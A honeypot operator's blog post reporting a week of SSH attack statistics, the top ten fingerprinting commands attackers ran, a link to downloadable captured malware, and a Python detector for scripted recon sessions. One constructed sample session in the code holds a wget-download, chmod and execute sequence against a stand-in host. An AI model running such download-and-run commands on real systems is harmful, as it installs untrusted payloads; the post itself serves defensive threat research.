The first HoneyPot Breakdown 13/09/2020

A quick introduction

I’ve been working on a neat side project for a while now, a global honeypot network I’m calling HoneypotDB. I have some previous posts around this project and I’m excited to announce that I’ll now be posting weekly analysis of trends and metrics collected by HoneypotDB, as well as a downloadable export of any malware uploaded to my pots!

My pots will automatically upload any new malware to S3 at 6PM every Sunday to https://hpdb-malware-drops.s3.amazonaws.com/index.html so feel free to poke around, this week’s batch is already in!

Each pot will upload a zip file containing any files uploaded or downloaded, plus the stdout/stderr output of any commands or scripts run on the pot. An info.json file is also included with some metadata 👍

Honeypot Breakdown

The first breakdown provides a great baseline for future comparisons, with a total of 8 unique pots reporting from 6 global cities.

HoneypotDB captured 148,767 unique SSH sessions this week, generating 154,259 login attempts, of which 148,228 failed and 6,031 were successful (any set of credentials is accepted after a random number of attempts, so a “successful” login is the pot letting the attacker in, not a real credential compromise).

This week, 4,186 unique usernames and 20,194 unique passwords were captured! I’m also planning on providing all captured usernames and passwords as a downloadable list in a future update, so watch this space!

We’ve seen 110 unique countries attacking this week, from 4,503 different source IP addresses and 1,072 different ISPs. The metric to beat for unique SSH client software is 111.

3,821 unique commands have also been entered this week, with this week’s top 10 most common commands being:

Command                                                                         Count
uname -a                                                                        3,038
cat /proc/cpuinfo | grep name | wc -l                                           3,013
cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'    3,011
free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'                       3,010
ls -lh $(which ls)                                                              3,009
which ls                                                                        3,009
crontab -l                                                                      3,008
w                                                                               3,007
cat /proc/cpuinfo | grep model | grep name | wc -l                              3,006
uname -m                                                                        3,006
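The counts above sit within a few dozen of each other (3,006 to 3,038), which is what a single scripted fingerprinting routine looks like: one bot family runs the same ten commands on every box it lands on. That makes the set itself a usable detection signature. The code below is an added example, not part of HoneypotDB: it splits captured command lines on `;`, `&&` and `||` (bots often send the whole script in one exec request), normalises whitespace, and labels a session as scripted recon when at least five of the ten fingerprint commands appear. The three sample sessions are constructed, not real captures.

```python
"""Classify SSH honeypot sessions against the top-10 recon fingerprint.

Added example, not HoneypotDB code. RECON_COMMANDS is the post's top 10;
SESSIONS is constructed sample input, not real captures.
"""
from collections import Counter
import re

RECON_COMMANDS = [
    "uname -a",
    "cat /proc/cpuinfo | grep name | wc -l",
    "cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'",
    "free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
    "ls -lh $(which ls)",
    "which ls",
    "crontab -l",
    "w",
    "cat /proc/cpuinfo | grep model | grep name | wc -l",
    "uname -m",
]


def normalise(cmd: str) -> str:
    """Collapse whitespace runs so minor spacing variants still match."""
    return re.sub(r"\s+", " ", cmd.strip())


RECON_SET = {normalise(c) for c in RECON_COMMANDS}


def split_commands(line: str) -> list:
    """Split a shell line on ; && || but not on single | (pipelines stay whole)."""
    parts = re.split(r"\s*(?:;|&&|\|\|)\s*", line)
    return [p for p in parts if p]


def classify_session(commands: list, threshold: int = 5) -> tuple:
    """Return (matched_count, label); label is 'scripted-recon' when at least
    `threshold` distinct fingerprint commands were seen in the session."""
    seen = set()
    for raw in commands:
        for cmd in split_commands(raw):
            n = normalise(cmd)
            if n in RECON_SET:
                seen.add(n)
    label = "scripted-recon" if len(seen) >= threshold else "other"
    return len(seen), label


def top_commands(sessions: dict, n: int = 10) -> list:
    """Rebuild the post's 'top N commands' table from per-session command lists."""
    counter = Counter()
    for cmds in sessions.values():
        for raw in cmds:
            for cmd in split_commands(raw):
                counter[normalise(cmd)] += 1
    return counter.most_common(n)


# Constructed sample sessions (not real HoneypotDB captures)
SESSIONS = {
    "sess-1": [
        "uname -a; cat /proc/cpuinfo | grep name | wc -l; which ls; "
        "ls -lh $(which ls); crontab -l; w; uname -m"
    ],
    "sess-2": [
        "cd /tmp && wget http://example.invalid/x86 -O x86",
        "chmod +x x86",
        "./x86",
    ],
    "sess-3": [
        "uname -a",
        "free -m  | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'",
        "crontab -l",
        "w",
        "uname -m",
        "cat /proc/cpuinfo | grep model | grep name | wc -l",
    ],
}

if __name__ == "__main__":
    for sid, cmds in SESSIONS.items():
        print(sid, classify_session(cmds))
    for cmd, count in top_commands(SESSIONS):
        print(f"{count:>5}  {cmd}")
```

Sessions labelled `other` (like `sess-2`, which goes straight to a download and execute) are the ones worth a closer look, since they are the ones carrying the payload rather than just fingerprinting the host.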

And finally, this week’s top attacking country is the USA 😲 followed closely by Russia and China.

Here is an overview of this week in pretty metrics 😀

[Figure: /12-honeypot-breakdown-13092020/hpdb-breakdown-14092020.png, Honeypot Breakdown 14092020]